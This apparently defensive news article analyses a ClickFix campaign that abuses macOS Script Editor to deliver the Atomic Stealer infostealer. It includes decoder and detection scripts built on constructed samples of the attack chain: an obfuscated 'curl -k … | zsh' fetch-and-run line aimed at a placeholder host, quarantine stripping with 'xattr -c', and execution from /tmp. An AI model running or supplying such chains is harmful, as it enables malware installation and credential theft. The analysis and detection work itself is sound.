New ClickFix Campaign Targets macOS with Atomic Stealer via Script Editor Hack

New ClickFix Campaign Exploits macOS Script Editor to Deploy Atomic Stealer

A newly identified ClickFix campaign is targeting macOS users by abusing the built-in Script Editor application to deliver the Atomic Stealer infostealer. The technique sidesteps the paste check Apple recently added to Terminal, and shows how quickly ClickFix operators adapt when one delivery path gains friction.

Understanding ClickFix Attacks

ClickFix is a social engineering technique in which attackers trick users into running malicious commands on their own machines, usually by presenting the command as the fix for a fake error or as a routine maintenance step. On macOS this historically meant instructing the victim to paste a one-liner into the Terminal application. With the release of macOS 26.4, Apple introduced a security feature that inspects commands pasted into Terminal, adding friction to that route. In response, the operators moved to Script Editor, a built-in macOS application for writing and running AppleScript, which the Terminal check does not cover.

The Attack Mechanism

The campaign begins with a deceptive webpage designed to resemble legitimate Apple maintenance tools. This page presents itself as a disk space cleanup utility, providing step-by-step instructions that mimic authentic macOS guidance.

When the user clicks the Execute button on the fake page, the page navigates to an `applescript://` URL. Script Editor is the registered handler for that URL scheme, so the browser (usually after a prompt asking whether to open Script Editor) launches it with the script body already loaded. The scheme does not run anything by itself: the script is merely displayed, dressed up as an Apple storage optimization utility with fake copyright headers, and the victim is coaxed into pressing Run.

Execution and Payload Delivery

Once the victim runs the script, the chain starts. The AppleScript's `do shell script` call hands a command line to `/bin/sh`. That command is obfuscated with `tr`: the real URL is stored as a scrambled string and a character-for-character `tr` translation reconstructs it only at runtime, so the URL never appears in plain text in the script. The reconstructed URL is fetched with `curl -k` (`--insecure`), which disables TLS certificate validation and lets the attacker serve the payload from a host with a self-signed or mismatched certificate. The response is piped straight into `zsh`, so the first-stage script executes without ever being written to disk as a file, leaving nothing for file-based scanning to inspect.
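As an added example (this is not code from the reporting or from the campaign), the following bash script shows how an analyst can triage such a link offline: it percent-decodes the `script=` parameter of an `applescript://` URL, re-applies the `tr` translation to recover the real download URL, and flags the risky constructs, all without opening Script Editor or executing the decoded command. The URL form (`com.apple.scripteditor?action=new&script=`) is the one assumed here, and the ROT13-style `tr` mapping, the scrambled literal and the `example.com` host are constructed for the demonstration; the real campaign's values are not reproduced.

```shell
#!/usr/bin/env bash
# Static triage of an applescript:// link without opening Script Editor or
# running anything. The sample URL is constructed for this example; example.com
# is a reserved documentation domain, not a real payload host. The script body
# is decoded into a variable and only ever inspected, so the $(...) command
# substitution inside it is never evaluated.

SAMPLE_URL='applescript://com.apple.scripteditor?action=new&script=do%20shell%20script%20%22curl%20-fsSLk%20%24(echo%20%27uggcf%3A%2F%2Frknzcyr.pbz%2Ffgntr1%27%20%7C%20tr%20%27A-Za-z%27%20%27N-ZA-Mn-za-m%27)%20%7C%20zsh%22'

# Percent-decode a string. Each %XX is converted through its octal value so
# this works in bash and POSIX sh alike. A %0A would be lost to the command
# substitution, which does not matter for one-line do shell script payloads.
urldecode() {
  local s="$1" out="" c hex
  while [ -n "$s" ]; do
    c="${s%"${s#?}"}"          # first character of the remaining input
    s="${s#?}"
    if [ "$c" = "%" ]; then
      hex="${s%"${s#??}"}"     # the two hex digits after the %
      s="${s#??}"
      out="$out$(printf "\\$(printf '%03o' "0x$hex")")"
    else
      out="$out$c"
    fi
  done
  printf '%s' "$out"
}

# The decoded script body carried by the URL's script= parameter.
script_body() {
  urldecode "${1#*script=}"
}

# Re-apply the tr translation the script would perform at runtime to recover
# the real download URL from the scrambled literal. Returns 1 when the body
# does not contain the echo '...' | tr 'set1' 'set2' pattern.
recover_url() {
  local body obf set1 set2
  body="$(script_body "$1")"
  obf="$(printf '%s' "$body" | sed -n "s/.*echo '\([^']*\)'.*/\1/p")"
  set1="$(printf '%s' "$body" | sed -n "s/.*tr '\([^']*\)' '\([^']*\)'.*/\1/p")"
  set2="$(printf '%s' "$body" | sed -n "s/.*tr '\([^']*\)' '\([^']*\)'.*/\2/p")"
  [ -n "$obf" ] && [ -n "$set1" ] && [ -n "$set2" ] || return 1
  printf '%s' "$obf" | tr "$set1" "$set2"
}

# Flag the constructs that make up the chain: a shell escape, curl with
# certificate checks disabled, output piped into a shell, and tr obfuscation.
# Prints a space-separated list of indicator names (empty for a benign script).
applescript_url_indicators() {
  local body hits=""
  body="$(script_body "$1")"
  case "$body" in *"do shell script"*) hits="$hits do-shell-script" ;; esac
  printf '%s' "$body" | grep -q 'curl' \
    && printf '%s' "$body" | grep -Eq '(^|[[:space:]])(-[A-Za-z]*k|--insecure)([[:space:]]|$)' \
    && hits="$hits curl-insecure"
  printf '%s' "$body" | grep -Eq '\|[[:space:]]*(zsh|bash|sh)([^A-Za-z0-9_]|$)' && hits="$hits pipe-to-shell"
  printf '%s' "$body" | grep -Eq "\|[[:space:]]*tr '" && hits="$hits tr-obfuscation"
  printf '%s\n' "${hits# }"
}

printf 'decoded script : %s\n' "$(script_body "$SAMPLE_URL")"
printf 'recovered URL  : %s\n' "$(recover_url "$SAMPLE_URL")"
printf 'indicators     : %s\n' "$(applescript_url_indicators "$SAMPLE_URL")"
```

The recovered URL is the value to pivot on (passive DNS, certificate transparency, proxy logs), and the indicator list is what a URL-rewriting mail or web gateway could key on before a user ever sees the page; the decoder deliberately relies on `sed` and `tr` rather than `eval` so that a hostile script body can never influence the analyst's own shell.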

The first-stage script is base64-encoded and gzip-compressed to hide its contents. Once decoded, it downloads a Mach-O binary, writes it to `/tmp/helper`, strips the file's extended attributes (typically `xattr -c`, which removes any `com.apple.quarantine` flag so Gatekeeper never evaluates the file; `curl` does not set that flag in the first place, so the step is belt and braces), marks it executable, and launches it. The binary is a variant of Atomic Stealer (also known as AMOS), a widely used macOS infostealer that harvests browser credentials, saved passwords, cryptocurrency wallets, and other sensitive data.
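For defenders, the chain above yields a concrete process-tree signature: Script Editor spawning `/bin/sh`, a `curl` invocation with `-k`, output piped into `zsh`, `xattr -c` on a file under `/tmp`, and finally execution from `/tmp`. The following bash/awk script, added here as an example and not part of the original reporting or of any product, encodes those rules and runs them over constructed process-execution events in the shape an EDR or `log show`-based collector might produce. Pids, timestamps, paths and the `example.com` host are made up; the benign Terminal `curl` and `xattr -d` events at the end are included to show the rules stay quiet on ordinary admin activity.

```shell
#!/usr/bin/env bash
# Detection logic for the Script Editor -> sh -> curl -k | zsh -> /tmp drop
# chain, run over constructed process-execution events. Fields are
# tab-separated: time, pid, ppid, parent process name, executable path, argv.
# Every value below is made up for the example.

sample_events() {
  printf '%s\t%s\t%s\t%s\t%s\t%s\n' \
    10:00:01 501 1   launchd         '/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor' 'Script Editor' \
    10:00:05 612 501 'Script Editor' /bin/sh        "sh -c curl -fsSLk \$(echo 'uggcf://rknzcyr.pbz/fgntr1' | tr 'A-Za-z' 'N-ZA-Mn-za-m') | zsh" \
    10:00:05 613 612 sh              /usr/bin/curl  'curl -fsSLk https://example.com/stage1' \
    10:00:05 614 612 sh              /bin/zsh       'zsh' \
    10:00:06 615 614 zsh             /usr/bin/xattr 'xattr -c /tmp/helper' \
    10:00:06 616 614 zsh             /bin/chmod     'chmod +x /tmp/helper' \
    10:00:06 617 614 zsh             /tmp/helper    '/tmp/helper' \
    10:05:00 700 450 Terminal        /usr/bin/curl  'curl -fsSL https://example.com/notes.txt -o notes.txt' \
    10:06:00 701 450 Terminal        /usr/bin/xattr 'xattr -d com.apple.quarantine /Users/me/Downloads/tool'
}

# Read events on stdin and print "pid<TAB>rule" for every rule that fires.
# Each rule is deliberately narrow: a shell under Script Editor, curl with
# certificate verification off, a pipe into a shell, quarantine stripped from
# a file in /tmp, and a process image living in /tmp.
detect_clickfix_chain() {
  awk '
    BEGIN { FS = "\t" }
    function alert(p, msg) { print p "\t" msg }
    {
      pid = $2; parent = $4; exe = $5; args = $6
      n = split(exe, parts, "/"); base = parts[n]
      if (parent == "Script Editor" && (base == "sh" || base == "zsh" || base == "bash"))
        alert(pid, "shell spawned by Script Editor (do shell script)")
      if (args ~ /(^| )curl( |$)/ && args ~ /(^| )(-[A-Za-z]*k|--insecure)( |$)/)
        alert(pid, "curl run with TLS certificate verification disabled")
      if (args ~ /\| *(zsh|bash|sh)( |$)/)
        alert(pid, "remote content piped into a shell")
      if (base == "xattr" && args ~ /(-c|-d com\.apple\.quarantine)/ && args ~ /\/(private\/)?tmp\//)
        alert(pid, "quarantine attribute stripped from a file in /tmp")
      if (exe ~ /^\/(private\/)?tmp\//)
        alert(pid, "executable launched from /tmp")
    }'
}

# Number of alerts the rules raise on the sample feed.
count_sample_alerts() {
  sample_events | detect_clickfix_chain | wc -l | tr -d ' '
}

sample_events | detect_clickfix_chain
```

On the sample feed the rules fire six times, all on the attack pids (three on the `sh -c` line alone, then the `curl`, the `xattr -c` and the `/tmp/helper` execution), and never on the two Terminal events. In production the first rule is the strongest single signal, since Script Editor launching a shell is rare outside developer workflows; the others are individually noisier and are best used as corroboration within the same process tree.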

Implications and Recommendations

This campaign underscores how quickly ClickFix operators adapt to platform defenses. By moving from Terminal to Script Editor, the attackers route the same paste-and-run lure through an application the new Terminal check does not cover, while still depending entirely on the victim to press Run.

To mitigate such threats, users and administrators should:

– Treat Unsolicited "Run This" Instructions as Hostile: Apple's own storage management lives in System Settings and never asks you to paste a command into Terminal or press Run in Script Editor. Close any web page that does, and never run a script you did not write or obtain from a source you trust.

– Verify the Authenticity of Maintenance Tools: Obtain system utilities only from Apple or from developers you can verify, and be suspicious of any "cleanup" tool delivered through a web page.

– Keep Software Updated: Update macOS and installed applications promptly; the Terminal paste check described above is one example of a platform defense that only helps once it is installed.

– Deploy and Tune Endpoint Monitoring: Security tooling that watches process trees can flag this chain directly. Script Editor spawning `/bin/sh`, `curl -k` output piped into `zsh`, `xattr -c` on a file under `/tmp`, and execution from `/tmp` are each uncommon in normal use and highly suspicious when they occur together.

By staying informed and adopting proactive security practices, users can better protect themselves against evolving cyber threats targeting macOS systems.